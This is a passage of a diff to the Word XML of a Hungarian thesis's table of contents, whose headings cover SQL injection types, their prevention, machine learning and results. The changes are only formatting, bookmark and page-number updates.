+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2036,14 +2054,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2056,24 +2073,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610877" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961903" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2083,41 +2103,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Vak (blind, inferential) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610877 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961903 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2125,14 +2145,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2145,24 +2164,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610878" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961904" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2172,41 +2194,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Sávon kívüli (out-of-band) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610878 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961904 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2214,14 +2236,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2234,17 +2255,20 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610879" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961905" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.2.</w:t>
@@ -2252,6 +2276,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2261,41 +2286,42 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Megelőzési módjai</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610879 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961905 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2303,302 +2329,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610880" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Előkészített utasítások (prepared statements) használata</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610880 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610881" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Tárolt eljárások (stored procedures) használata</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610881 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610882" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610882 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610883" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610883 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2611,24 +2348,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610884" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961906" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2638,41 +2378,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>GÉPI TANULÁS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610884 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961906 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2680,14 +2420,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2700,24 +2439,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610885" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961907" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2727,41 +2469,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>PROGRAM FELÉPÍTÉSE</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610885 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961907 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2769,14 +2511,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2789,24 +2530,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610886" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961908" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>4.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2816,41 +2560,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610886 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961908 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2858,14 +2602,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2877,52 +2620,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610887" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961909" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Irodalomjegyzék</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610887 \h </w:instrText>
-            </w:r>
-            <w:r>
